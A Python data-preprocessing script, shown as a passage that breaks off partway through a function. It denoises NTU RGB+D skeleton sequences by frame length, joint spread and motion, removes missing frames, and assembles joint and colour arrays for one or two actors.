CONVERTER: convert_anything_to_text,
AVAILABILITY: availability_anything,
},
}
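# --- Illustrative sketch (not part of the original module): ext_map is a plain
# dict keyed by lowercased extension, so callers can register extra handlers.
# The '.md' entry below is a hypothetical example; it reuses
# get_file_contents_text, which already handles plain-text formats.
def register_markdown_handler() -> None:
    """Register a plain-text converter for Markdown files (example only)."""
    ext_map['.md'] = {
        CONVERTER: get_file_contents_text,
        AVAILABILITY: True,
    }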
def document_to_text(filename: str = None,
blob: bytes = None,
extension: str = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
if not filename and not blob:
raise ValueError("document_to_text: no filename and no blob")
if filename and blob:
raise ValueError("document_to_text: specify either filename or blob")
if blob and not extension:
raise ValueError("document_to_text: need extension hint for blob")
if filename:
stub, extension = os.path.splitext(filename)
else:
if extension[0] != ".":
extension = "." + extension
extension = extension.lower()
log.debug(
f"filename: {filename}, blob type: {type(blob)}, "
f"blob length: {len(blob) if blob is not None else None}, "
f"extension: {extension}")
if filename and not os.path.isfile(filename):
raise ValueError(f"document_to_text: no such file: {filename!r}")
info = ext_map.get(extension)
if info is None:
log.warning("Unknown filetype: {}; using generic tool", extension)
info = ext_map[None]
func = info[CONVERTER]
text = func(filename, blob, config)
if config.rstrip:
text = rstrip_all_lines(text)
return text
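# --- Usage sketch (illustrative; 'report.docx' is a placeholder path, and the
# relevant third-party tools must be installed). document_to_text() accepts a
# filename, or a blob plus an extension hint, but never both:
def _demo_document_to_text() -> None:
    text_from_file = document_to_text(filename='report.docx')
    with open('report.docx', 'rb') as f:
        text_from_blob = document_to_text(blob=f.read(), extension='.docx')
    assert text_from_file == text_from_blob  # both routes should agree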
def is_text_extractor_available(extension: str) -> bool:
if extension is not None:
extension = extension.lower()
info = ext_map.get(extension)
if info is None:
return False
availability = info[AVAILABILITY]
    if isinstance(availability, bool):
return availability
elif callable(availability):
return availability()
else:
raise ValueError(
f"Bad information object for extension: {extension}")
def require_text_extractor(extension: str) -> None:
if not is_text_extractor_available(extension):
raise ValueError(
f"No text extractor available for extension: {extension}")
def main() -> None:
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("inputfile", nargs="?", help="Input file name")
parser.add_argument(
"--availability", nargs='*',
help="File extensions to check availability for (use a '.' prefix, "
"and use the special extension 'None' to check the fallback "
"processor")
    parser.add_argument(
        '--plain', action='store_true',
        help="Use the plainest format (affects e.g. table layouts)")
    parser.add_argument(
        '--semiplain', action='store_true',
        help="Use a semi-plain format (affects e.g. table layouts)")
    parser.add_argument(
        "--width", type=int, default=DEFAULT_WIDTH,
        help="Word wrapping width")
    parser.add_argument(
        "--min-col-width", type=int, default=DEFAULT_MIN_COL_WIDTH,
        help="Minimum column width for tables")
args = parser.parse_args()
if args.availability:
for ext in args.availability:
if ext.lower() == 'none':
ext = None
available = is_text_extractor_available(ext)
print(f"Extractor for extension {ext} present: {available}")
return
if not args.inputfile:
parser.print_help(sys.stderr)
return
config = TextProcessingConfig(
width=args.width,
min_col_width=args.min_col_width,
plain=args.plain,
semiplain=args.semiplain,
)
result = document_to_text(filename=args.inputfile, config=config)
if result is None:
return
else:
print(result)
if __name__ == '__main__':
main()
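# Command-line usage sketch (assuming this module is saved as doctotext.py and
# the optional external tools are on PATH):
#   python doctotext.py report.docx --width 100
#   python doctotext.py --availability .pdf .rtf None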
| true
| true
|
1c447439820c7450726bb3a1955016d4b5b8390e
| 7,579
|
py
|
Python
|
homeassistant/components/scrape/sensor.py
|
mib1185/core
|
b17d4ac65cde9a27ff6032d70b148792e5eba8df
|
[
"Apache-2.0"
] | 30,023
|
2016-04-13T10:17:53.000Z
|
2020-03-02T12:56:31.000Z
|
homeassistant/components/scrape/sensor.py
|
mib1185/core
|
b17d4ac65cde9a27ff6032d70b148792e5eba8df
|
[
"Apache-2.0"
] | 24,710
|
2016-04-13T08:27:26.000Z
|
2020-03-02T12:59:13.000Z
|
homeassistant/components/scrape/sensor.py
|
mib1185/core
|
b17d4ac65cde9a27ff6032d70b148792e5eba8df
|
[
"Apache-2.0"
] | 11,956
|
2016-04-13T18:42:31.000Z
|
2020-03-02T09:32:12.000Z
|
"""Support for getting data from websites with scraping."""
from __future__ import annotations
import logging
from typing import Any
from bs4 import BeautifulSoup
import voluptuous as vol
from homeassistant.components.rest.data import RestData
from homeassistant.components.sensor import (
CONF_STATE_CLASS,
DEVICE_CLASSES_SCHEMA,
PLATFORM_SCHEMA as PARENT_PLATFORM_SCHEMA,
STATE_CLASSES_SCHEMA,
SensorEntity,
)
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import (
CONF_ATTRIBUTE,
CONF_AUTHENTICATION,
CONF_DEVICE_CLASS,
CONF_HEADERS,
CONF_NAME,
CONF_PASSWORD,
CONF_RESOURCE,
CONF_UNIT_OF_MEASUREMENT,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
CONF_VERIFY_SSL,
HTTP_BASIC_AUTHENTICATION,
HTTP_DIGEST_AUTHENTICATION,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.device_registry import DeviceEntryType
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.template import Template
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from .const import CONF_INDEX, CONF_SELECT, DEFAULT_NAME, DEFAULT_VERIFY_SSL, DOMAIN
_LOGGER = logging.getLogger(__name__)
ICON = "mdi:web"
PLATFORM_SCHEMA = PARENT_PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_RESOURCE): cv.string,
vol.Required(CONF_SELECT): cv.string,
vol.Optional(CONF_ATTRIBUTE): cv.string,
vol.Optional(CONF_INDEX, default=0): cv.positive_int,
vol.Optional(CONF_AUTHENTICATION): vol.In(
[HTTP_BASIC_AUTHENTICATION, HTTP_DIGEST_AUTHENTICATION]
),
vol.Optional(CONF_HEADERS): vol.Schema({cv.string: cv.string}),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_STATE_CLASS): STATE_CLASSES_SCHEMA,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_VALUE_TEMPLATE): cv.string,
vol.Optional(CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean,
}
)
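# --- Illustrative check (not part of the integration): PLATFORM_SCHEMA can be
# called directly to see which keys a YAML platform entry must provide. The
# resource URL and CSS selector below are placeholders.
def _example_validated_config() -> dict:
    return PLATFORM_SCHEMA(
        {
            "platform": "scrape",
            CONF_RESOURCE: "https://www.example.com",
            CONF_SELECT: ".current-version h1",
        }
    )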
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the Web scrape sensor."""
_LOGGER.warning(
# Config flow added in Home Assistant Core 2022.7, remove import flow in 2022.9
"Loading Scrape via platform setup has been deprecated in Home Assistant 2022.7 "
"Your configuration has been automatically imported and you can "
"remove it from your configuration.yaml"
)
if config.get(CONF_VALUE_TEMPLATE):
template: Template = Template(config[CONF_VALUE_TEMPLATE])
template.ensure_valid()
config[CONF_VALUE_TEMPLATE] = template.template
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=config,
)
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up the Scrape sensor entry."""
name: str = entry.options[CONF_NAME]
resource: str = entry.options[CONF_RESOURCE]
select: str | None = entry.options.get(CONF_SELECT)
attr: str | None = entry.options.get(CONF_ATTRIBUTE)
index: int = int(entry.options[CONF_INDEX])
unit: str | None = entry.options.get(CONF_UNIT_OF_MEASUREMENT)
device_class: str | None = entry.options.get(CONF_DEVICE_CLASS)
state_class: str | None = entry.options.get(CONF_STATE_CLASS)
value_template: str | None = entry.options.get(CONF_VALUE_TEMPLATE)
entry_id: str = entry.entry_id
val_template: Template | None = None
if value_template is not None:
val_template = Template(value_template, hass)
rest = hass.data[DOMAIN][entry.entry_id]
async_add_entities(
[
ScrapeSensor(
rest,
name,
select,
attr,
index,
val_template,
unit,
device_class,
state_class,
entry_id,
resource,
)
],
True,
)
class ScrapeSensor(SensorEntity):
"""Representation of a web scrape sensor."""
_attr_icon = ICON
def __init__(
self,
rest: RestData,
name: str,
select: str | None,
attr: str | None,
index: int,
value_template: Template | None,
unit: str | None,
device_class: str | None,
state_class: str | None,
entry_id: str,
resource: str,
) -> None:
"""Initialize a web scrape sensor."""
self.rest = rest
self._attr_native_value = None
self._select = select
self._attr = attr
self._index = index
self._value_template = value_template
self._attr_name = name
self._attr_native_unit_of_measurement = unit
self._attr_device_class = device_class
self._attr_state_class = state_class
self._attr_unique_id = entry_id
self._attr_device_info = DeviceInfo(
entry_type=DeviceEntryType.SERVICE,
identifiers={(DOMAIN, entry_id)},
manufacturer="Scrape",
name=name,
configuration_url=resource,
)
def _extract_value(self) -> Any:
"""Parse the html extraction in the executor."""
raw_data = BeautifulSoup(self.rest.data, "lxml")
_LOGGER.debug(raw_data)
try:
if self._attr is not None:
value = raw_data.select(self._select)[self._index][self._attr]
else:
tag = raw_data.select(self._select)[self._index]
if tag.name in ("style", "script", "template"):
value = tag.string
else:
value = tag.text
except IndexError:
_LOGGER.warning("Index '%s' not found in %s", self._attr, self.entity_id)
value = None
except KeyError:
_LOGGER.warning(
"Attribute '%s' not found in %s", self._attr, self.entity_id
)
value = None
_LOGGER.debug(value)
return value
async def async_update(self) -> None:
"""Get the latest data from the source and updates the state."""
await self.rest.async_update()
await self._async_update_from_rest_data()
async def async_added_to_hass(self) -> None:
"""Ensure the data from the initial update is reflected in the state."""
await self._async_update_from_rest_data()
async def _async_update_from_rest_data(self) -> None:
"""Update state from the rest data."""
if self.rest.data is None:
_LOGGER.error("Unable to retrieve data for %s", self.name)
return
value = await self.hass.async_add_executor_job(self._extract_value)
if self._value_template is not None:
self._attr_native_value = (
self._value_template.async_render_with_possible_json_value(value, None)
)
else:
self._attr_native_value = value
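# --- Standalone illustration (not part of the integration) of the same
# select/index/attribute rules _extract_value applies, on made-up HTML:
def _selector_examples() -> None:
    html = '<div class="v"><a href="/x">1.0</a></div><div class="v">2.0</div>'
    soup = BeautifulSoup(html, "lxml")
    assert soup.select(".v")[1].text == "2.0"      # index-based extraction
    assert soup.select(".v a")[0]["href"] == "/x"  # attribute-based extraction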
| 33.535398
| 89
| 0.65312
| true
| true
|
1c44747e85ccb4efd346c533db7efda9c279aaae
| 142
|
py
|
Python
|
python-pyqt/Section02/finplot_mod/01.py
|
sharebook-kr/learningspoons-bootcamp-finance
|
0288f3f3b39f54420e4e9987f1de12892dc680ea
|
[
"MIT"
] | 9
|
2020-10-25T15:13:32.000Z
|
2022-03-26T11:27:21.000Z
|
python-pyqt/Section02/finplot_mod/01.py
|
sharebook-kr/learningspoons-bootcamp-finance
|
0288f3f3b39f54420e4e9987f1de12892dc680ea
|
[
"MIT"
] | null | null | null |
python-pyqt/Section02/finplot_mod/01.py
|
sharebook-kr/learningspoons-bootcamp-finance
|
0288f3f3b39f54420e4e9987f1de12892dc680ea
|
[
"MIT"
] | 7
|
2021-03-01T11:06:45.000Z
|
2022-03-14T07:06:04.000Z
|
import finplot as fplt
import yfinance

# Download daily OHLCV history for Apple and draw a candlestick chart.
df = yfinance.download('AAPL')
# candlestick_ochl expects columns in open-close-high-low order.
fplt.candlestick_ochl(df[['Open', 'Close', 'High', 'Low']])
fplt.show()
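# Illustrative extension (add before fplt.show() so it renders on the same
# axis; the 20-bar window is an arbitrary choice):
#   fplt.plot(df['Close'].rolling(20).mean(), legend='MA20')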
| 23.666667
| 59
| 0.711268
| true
| true
|
1c44752cff7dde1bc65d8065a410394ce0f2c6ff
| 3,306
|
py
|
Python
|
code/spatial_embedding.py
|
guangyizhangbci/EEG_Riemannian
|
2d301bf3d06a192da2829c1c54b24d388ddea1dd
|
[
"MIT"
] | 12
|
2022-02-22T17:15:04.000Z
|
2022-03-19T11:41:15.000Z
|
code/spatial_embedding.py
|
guangyizhangbci/RFNet
|
2d301bf3d06a192da2829c1c54b24d388ddea1dd
|
[
"MIT"
] | null | null | null |
code/spatial_embedding.py
|
guangyizhangbci/RFNet
|
2d301bf3d06a192da2829c1c54b24d388ddea1dd
|
[
"MIT"
] | null | null | null |
from __future__ import print_function, division
import numpy as np
from sklearn.preprocessing import StandardScaler
import pyriemann
from pyriemann.estimation import Covariances
from library.spfiltering import ProjCommonSpace
from library.featuring import Riemann, NaiveVec  # NaiveVec (used below) is assumed to live alongside Riemann
class spatial_features():
    def __init__(self, config, dataset, rieman_flag, rank_num):
        self.rieman_flag = rieman_flag  # use Riemannian geometry or not
        self.rank_num = rank_num  # rank of the covariance matrix projection
        self.dataset = dataset  # dataset name
        self.config = config  # dataset-specific configuration dictionary
def tangentspace_learning(self, spoc):
        ''' Map covariance features from the Riemannian manifold to its tangent space '''
geom = Riemann(n_fb=1, metric='riemann').transform(spoc)
scaler = StandardScaler()
scaler.fit(geom)
sc = scaler.transform(geom)
return sc
def projection(self, X_train, X_test, rieman_flag, rank_num):
'''Estimation of covariance matrix'''
cov_train = Covariances('oas').transform(X_train)
cov_train = cov_train[:, None, :, :]
cov_test = Covariances('oas').transform(X_test)
cov_test = cov_test[:, None, :, :]
        if not self.rieman_flag:
            ''' Direct vectorization of spatial covariance matrices (no Riemannian geometry) '''
            sc_train = NaiveVec(method='upper').transform(cov_train)
            sc_test = NaiveVec(method='upper').transform(cov_test)
else:
# spoc = ProjSPoCSpace(n_compo=n_compo, scale='auto')
'''Dimensionality Reduction'''
spoc = ProjCommonSpace(rank_num=rank_num)
# spoc = ProjSPoCSpace(rank_num=rank_num, scale='auto')
spoc_train = spoc.fit(cov_train).transform(cov_train)
spoc_test = spoc.fit(cov_train).transform(cov_test)
# sc_train = spoc_train[:,0,:,:]
# sc_test = spoc_test[:,0,:,:]
            '''Tangent space mapping'''
sc_train = self.tangentspace_learning(spoc_train)
sc_test = self.tangentspace_learning(spoc_test)
return sc_train, sc_test
def embedding(self, X_train, X_test):
train_embed = []
test_embed = []
'''
Concatenate spatial embeddings from each frequency band
'''
for freqband_band in range(0, self.config[self.dataset]['Band_No']):
X_training = X_train[:,freqband_band,:,:]
X_testing = X_test[:,freqband_band,:,:]
train_embedding, test_embedding = self.projection(X_training, X_testing, self.rieman_flag, self.rank_num)
train_embed.append(train_embedding)
test_embed.append(test_embedding)
train_embed = np.asarray(train_embed)
test_embed = np.asarray(test_embed)
train_embed = np.transpose(train_embed, [1, 0, 2])
test_embed = np.transpose(test_embed, [1, 0, 2])
        train_embed = np.reshape(train_embed, (train_embed.shape[0], train_embed.shape[1]*train_embed.shape[2]))  # concatenate features from different EEG bands
test_embed = np.reshape(test_embed, (test_embed.shape[0], test_embed.shape[1]*test_embed.shape[2]))
return train_embed, test_embed
#
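# --- Usage sketch (illustrative: the dataset name, band count and array shapes
# are made up, and it assumes the bundled `library` package behaves as used
# above). Inputs follow the (trials, bands, channels, samples) layout that
# embedding() expects.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    config = {'TOY': {'Band_No': 2}}
    X_train = rng.randn(20, 2, 8, 128)  # 20 trials, 2 bands, 8 channels
    X_test = rng.randn(5, 2, 8, 128)
    sf = spatial_features(config, 'TOY', rieman_flag=True, rank_num=4)
    train_embed, test_embed = sf.embedding(X_train, X_test)
    print(train_embed.shape, test_embed.shape)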
| 34.8
| 158
| 0.645796
| true
| true
|
1c4475e321d4980d398c6000935266e034bebe6a
| 18,502
|
py
|
Python
|
data/ntu/get_raw_denoised_data.py
|
mhrah7495/View-Adaptive-Neural-Networks-for-Skeleton-based-Human-Action-Recognition
|
4b91b79dff7363010300ef5fb1564a57a65ea7cf
|
[
"MIT"
] | 111
|
2019-09-19T08:07:17.000Z
|
2022-03-09T07:19:07.000Z
|
data/ntu/get_raw_denoised_data.py
|
Jagadish-Kumaran/View-Adaptive-Neural-Networks-for-Skeleton-based-Human-Action-Recognition
|
b2113aa6295d7292516d5a74582b619d775a5b3d
|
[
"MIT"
] | 14
|
2019-10-18T08:45:42.000Z
|
2021-11-04T06:38:40.000Z
|
data/ntu/get_raw_denoised_data.py
|
Jagadish-Kumaran/View-Adaptive-Neural-Networks-for-Skeleton-based-Human-Action-Recognition
|
b2113aa6295d7292516d5a74582b619d775a5b3d
|
[
"MIT"
] | 52
|
2019-09-18T11:54:47.000Z
|
2022-01-17T09:12:19.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import os.path as osp
import numpy as np
import pickle
import logging
root_path = './'
raw_data_file = osp.join(root_path, 'raw_data', 'raw_skes_data.pkl')
save_path = osp.join(root_path, 'denoised_data')
if not osp.exists(save_path):
os.mkdir(save_path)
rgb_ske_path = osp.join(save_path, 'rgb+ske')
if not osp.exists(rgb_ske_path):
os.mkdir(rgb_ske_path)
actors_info_dir = osp.join(save_path, 'actors_info')
if not osp.exists(actors_info_dir):
os.mkdir(actors_info_dir)
missing_count = 0
noise_len_thres = 11
noise_spr_thres1 = 0.8
noise_spr_thres2 = 0.69754
noise_mot_thres_lo = 0.089925
noise_mot_thres_hi = 2
noise_len_logger = logging.getLogger('noise_length')
noise_len_logger.setLevel(logging.INFO)
noise_len_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_length.log')))
noise_len_logger.info('{:^20}\t{:^17}\t{:^8}\t{}'.format('Skeleton', 'bodyID', 'Motion', 'Length'))
noise_spr_logger = logging.getLogger('noise_spread')
noise_spr_logger.setLevel(logging.INFO)
noise_spr_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_spread.log')))
noise_spr_logger.info('{:^20}\t{:^17}\t{:^8}\t{:^8}'.format('Skeleton', 'bodyID', 'Motion', 'Rate'))
noise_mot_logger = logging.getLogger('noise_motion')
noise_mot_logger.setLevel(logging.INFO)
noise_mot_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_motion.log')))
noise_mot_logger.info('{:^20}\t{:^17}\t{:^8}'.format('Skeleton', 'bodyID', 'Motion'))
fail_logger_1 = logging.getLogger('noise_outliers_1')
fail_logger_1.setLevel(logging.INFO)
fail_logger_1.addHandler(logging.FileHandler(osp.join(save_path, 'denoised_failed_1.log')))
fail_logger_2 = logging.getLogger('noise_outliers_2')
fail_logger_2.setLevel(logging.INFO)
fail_logger_2.addHandler(logging.FileHandler(osp.join(save_path, 'denoised_failed_2.log')))
missing_skes_logger = logging.getLogger('missing_frames')
missing_skes_logger.setLevel(logging.INFO)
missing_skes_logger.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes.log')))
missing_skes_logger.info('{:^20}\t{}\t{}'.format('Skeleton', 'num_frames', 'num_missing'))
missing_skes_logger1 = logging.getLogger('missing_frames_1')
missing_skes_logger1.setLevel(logging.INFO)
missing_skes_logger1.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes_1.log')))
missing_skes_logger1.info('{:^20}\t{}\t{}\t{}\t{}\t{}'.format('Skeleton', 'num_frames', 'Actor1',
'Actor2', 'Start', 'End'))
missing_skes_logger2 = logging.getLogger('missing_frames_2')
missing_skes_logger2.setLevel(logging.INFO)
missing_skes_logger2.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes_2.log')))
missing_skes_logger2.info('{:^20}\t{}\t{}\t{}'.format('Skeleton', 'num_frames', 'Actor1', 'Actor2'))
def denoising_by_length(ske_name, bodies_data):
"""
    Denoise data based on the frame length for each bodyID.
    Filter out any bodyID whose sequence length is less than or equal to the
    predefined threshold.
"""
noise_info = str()
new_bodies_data = bodies_data.copy()
for (bodyID, body_data) in new_bodies_data.items():
length = len(body_data['interval'])
if length <= noise_len_thres:
noise_info += 'Filter out: %s, %d (length).\n' % (bodyID, length)
noise_len_logger.info('{}\t{}\t{:.6f}\t{:^6d}'.format(ske_name, bodyID,
body_data['motion'], length))
del bodies_data[bodyID]
if noise_info != '':
noise_info += '\n'
return bodies_data, noise_info
def get_valid_frames_by_spread(points):
"""
    Find the valid (reasonable) frame indices based on the spread of X and Y.
:param points: joints or colors
"""
num_frames = points.shape[0]
valid_frames = []
for i in range(num_frames):
x = points[i, :, 0]
y = points[i, :, 1]
if (x.max() - x.min()) <= noise_spr_thres1 * (y.max() - y.min()): # 0.8
valid_frames.append(i)
return valid_frames
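# --- Illustrative check of the spread heuristic above (coordinates are made
# up): a frame is kept only when its X spread is at most 0.8x its Y spread,
# reflecting the assumption that a standing body is taller than it is wide.
def _spread_rule_example() -> None:
    frames = np.zeros((2, 25, 3), dtype=np.float32)
    frames[:, :, 0] = np.linspace(0.0, 1.0, 25)  # X spread = 1.0 in both frames
    frames[0, :, 1] = np.linspace(0.0, 2.0, 25)  # tall pose -> kept
    frames[1, :, 1] = np.linspace(0.0, 1.0, 25)  # as wide as tall -> dropped
    assert get_valid_frames_by_spread(frames) == [0]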
def denoising_by_spread(ske_name, bodies_data):
"""
    Denoise data based on the spread of the X and Y values.
    Filter out any bodyID for which the ratio of noisy frames exceeds the
    predefined threshold.
bodies_data: contains at least 2 bodyIDs
"""
noise_info = str()
denoised_by_spr = False # mark if this sequence has been processed by spread.
new_bodies_data = bodies_data.copy()
# for (bodyID, body_data) in bodies_data.items():
for (bodyID, body_data) in new_bodies_data.items():
if len(bodies_data) == 1:
break
valid_frames = get_valid_frames_by_spread(body_data['joints'].reshape(-1, 25, 3))
num_frames = len(body_data['interval'])
num_noise = num_frames - len(valid_frames)
if num_noise == 0:
continue
ratio = num_noise / float(num_frames)
motion = body_data['motion']
if ratio >= noise_spr_thres2: # 0.69754
del bodies_data[bodyID]
denoised_by_spr = True
noise_info += 'Filter out: %s (spread rate >= %.2f).\n' % (bodyID, noise_spr_thres2)
noise_spr_logger.info('%s\t%s\t%.6f\t%.6f' % (ske_name, bodyID, motion, ratio))
else: # Update motion
joints = body_data['joints'].reshape(-1, 25, 3)[valid_frames]
body_data['motion'] = min(motion, np.sum(np.var(joints.reshape(-1, 3), axis=0)))
noise_info += '%s: motion %.6f -> %.6f\n' % (bodyID, motion, body_data['motion'])
# TODO: Consider removing noisy frames for each bodyID
if noise_info != '':
noise_info += '\n'
return bodies_data, noise_info, denoised_by_spr
def denoising_by_motion(ske_name, bodies_data, bodies_motion):
"""
    Filter out any bodyID whose motion falls outside the predefined interval.
"""
# Sort bodies based on the motion, return a list of tuples
# bodies_motion = sorted(bodies_motion.items(), key=lambda x, y: cmp(x[1], y[1]), reverse=True)
bodies_motion = sorted(bodies_motion.items(), key=lambda x: x[1], reverse=True)
# Reserve the body data with the largest motion
denoised_bodies_data = [(bodies_motion[0][0], bodies_data[bodies_motion[0][0]])]
noise_info = str()
for (bodyID, motion) in bodies_motion[1:]:
if (motion < noise_mot_thres_lo) or (motion > noise_mot_thres_hi):
noise_info += 'Filter out: %s, %.6f (motion).\n' % (bodyID, motion)
noise_mot_logger.info('{}\t{}\t{:.6f}'.format(ske_name, bodyID, motion))
else:
denoised_bodies_data.append((bodyID, bodies_data[bodyID]))
if noise_info != '':
noise_info += '\n'
return denoised_bodies_data, noise_info
def denoising_bodies_data(bodies_data):
"""
    Denoise data based on several heuristics; not guaranteed to be correct for
    all samples.
    Return:
        denoised_bodies_data (list): tuples of (bodyID, body_data).
"""
ske_name = bodies_data['name']
bodies_data = bodies_data['data']
# Step 1: Denoising based on frame length.
bodies_data, noise_info_len = denoising_by_length(ske_name, bodies_data)
if len(bodies_data) == 1: # only has one bodyID left after step 1
return bodies_data.items(), noise_info_len
# Step 2: Denoising based on spread.
bodies_data, noise_info_spr, denoised_by_spr = denoising_by_spread(ske_name, bodies_data)
if len(bodies_data) == 1:
return bodies_data.items(), noise_info_len + noise_info_spr
bodies_motion = dict() # get body motion
for (bodyID, body_data) in bodies_data.items():
bodies_motion[bodyID] = body_data['motion']
# Sort bodies based on the motion
# bodies_motion = sorted(bodies_motion.items(), key=lambda x, y: cmp(x[1], y[1]), reverse=True)
bodies_motion = sorted(bodies_motion.items(), key=lambda x: x[1], reverse=True)
denoised_bodies_data = list()
for (bodyID, _) in bodies_motion:
denoised_bodies_data.append((bodyID, bodies_data[bodyID]))
return denoised_bodies_data, noise_info_len + noise_info_spr
# TODO: Consider denoising further by integrating motion method
# if denoised_by_spr: # this sequence has been denoised by spread
# bodies_motion = sorted(bodies_motion.items(), lambda x, y: cmp(x[1], y[1]), reverse=True)
# denoised_bodies_data = list()
# for (bodyID, _) in bodies_motion:
# denoised_bodies_data.append((bodyID, bodies_data[bodyID]))
# return denoised_bodies_data, noise_info
# Step 3: Denoising based on motion
# bodies_data, noise_info = denoising_by_motion(ske_name, bodies_data, bodies_motion)
# return bodies_data, noise_info
def get_one_actor_points(body_data, num_frames):
"""
Get joints and colors for only one actor.
For joints, each frame contains 75 X-Y-Z coordinates.
For colors, each frame contains 25 x 2 (X, Y) coordinates.
"""
joints = np.zeros((num_frames, 75), dtype=np.float32)
colors = np.ones((num_frames, 1, 25, 2), dtype=np.float32) * np.nan
start, end = body_data['interval'][0], body_data['interval'][-1]
joints[start:end + 1] = body_data['joints'].reshape(-1, 75)
colors[start:end + 1, 0] = body_data['colors']
return joints, colors
def remove_missing_frames(ske_name, joints, colors):
"""
    Cut off missing frames in which all joint positions are 0s.
    For sequences with 2 actors' data, also record the number of missing frames
    for actor1 and actor2, respectively (for debugging).
"""
num_frames = joints.shape[0]
num_bodies = colors.shape[1] # 1 or 2
if num_bodies == 2: # DEBUG
missing_indices_1 = np.where(joints[:, :75].sum(axis=1) == 0)[0]
missing_indices_2 = np.where(joints[:, 75:].sum(axis=1) == 0)[0]
cnt1 = len(missing_indices_1)
cnt2 = len(missing_indices_2)
start = 1 if 0 in missing_indices_1 else 0
end = 1 if num_frames - 1 in missing_indices_1 else 0
if max(cnt1, cnt2) > 0:
if cnt1 > cnt2:
info = '{}\t{:^10d}\t{:^6d}\t{:^6d}\t{:^5d}\t{:^3d}'.format(ske_name, num_frames,
cnt1, cnt2, start, end)
missing_skes_logger1.info(info)
else:
info = '{}\t{:^10d}\t{:^6d}\t{:^6d}'.format(ske_name, num_frames, cnt1, cnt2)
missing_skes_logger2.info(info)
# Find valid frame indices that the data is not missing or lost
# For two-subjects action, this means both data of actor1 and actor2 is missing.
valid_indices = np.where(joints.sum(axis=1) != 0)[0] # 0-based index
missing_indices = np.where(joints.sum(axis=1) == 0)[0]
num_missing = len(missing_indices)
if num_missing > 0: # Update joints and colors
joints = joints[valid_indices]
colors[missing_indices] = np.nan
global missing_count
missing_count += 1
missing_skes_logger.info('{}\t{:^10d}\t{:^11d}'.format(ske_name, num_frames, num_missing))
return joints, colors
def get_bodies_info(bodies_data):
bodies_info = '{:^17}\t{}\t{:^8}\n'.format('bodyID', 'Interval', 'Motion')
for (bodyID, body_data) in bodies_data.items():
start, end = body_data['interval'][0], body_data['interval'][-1]
bodies_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), body_data['motion'])
return bodies_info + '\n'
def get_two_actors_points(bodies_data):
"""
Get the first and second actor's joints positions and colors locations.
# Arguments:
bodies_data (dict): 3 key-value pairs: 'name', 'data', 'num_frames'.
bodies_data['data'] is also a dict, while the key is bodyID, the value is
the corresponding body_data which is also a dict with 4 keys:
- joints: raw 3D joints positions. Shape: (num_frames x 25, 3)
- colors: raw 2D color locations. Shape: (num_frames, 25, 2)
- interval: a list which records the frame indices.
- motion: motion amount
# Return:
joints, colors.
"""
ske_name = bodies_data['name']
label = int(ske_name[-2:])
num_frames = bodies_data['num_frames']
bodies_info = get_bodies_info(bodies_data['data'])
bodies_data, noise_info = denoising_bodies_data(bodies_data) # Denoising data
bodies_info += noise_info
bodies_data = list(bodies_data)
if len(bodies_data) == 1: # Only left one actor after denoising
if label >= 50: # DEBUG: Denoising failed for two-subjects action
fail_logger_2.info(ske_name)
bodyID, body_data = bodies_data[0]
joints, colors = get_one_actor_points(body_data, num_frames)
bodies_info += 'Main actor: %s' % bodyID
else:
if label < 50: # DEBUG: Denoising failed for one-subject action
fail_logger_1.info(ske_name)
joints = np.zeros((num_frames, 150), dtype=np.float32)
colors = np.ones((num_frames, 2, 25, 2), dtype=np.float32) * np.nan
bodyID, actor1 = bodies_data[0] # the 1st actor with largest motion
start1, end1 = actor1['interval'][0], actor1['interval'][-1]
joints[start1:end1 + 1, :75] = actor1['joints'].reshape(-1, 75)
colors[start1:end1 + 1, 0] = actor1['colors']
actor1_info = '{:^17}\t{}\t{:^8}\n'.format('Actor1', 'Interval', 'Motion') + \
'{}\t{:^8}\t{:f}\n'.format(bodyID, str([start1, end1]), actor1['motion'])
del bodies_data[0]
actor2_info = '{:^17}\t{}\t{:^8}\n'.format('Actor2', 'Interval', 'Motion')
start2, end2 = [0, 0] # initial interval for actor2 (virtual)
while len(bodies_data) > 0:
bodyID, actor = bodies_data[0]
start, end = actor['interval'][0], actor['interval'][-1]
if min(end1, end) - max(start1, start) <= 0: # no overlap with actor1
joints[start:end + 1, :75] = actor['joints'].reshape(-1, 75)
colors[start:end + 1, 0] = actor['colors']
actor1_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), actor['motion'])
# Update the interval of actor1
start1 = min(start, start1)
end1 = max(end, end1)
elif min(end2, end) - max(start2, start) <= 0: # no overlap with actor2
joints[start:end + 1, 75:] = actor['joints'].reshape(-1, 75)
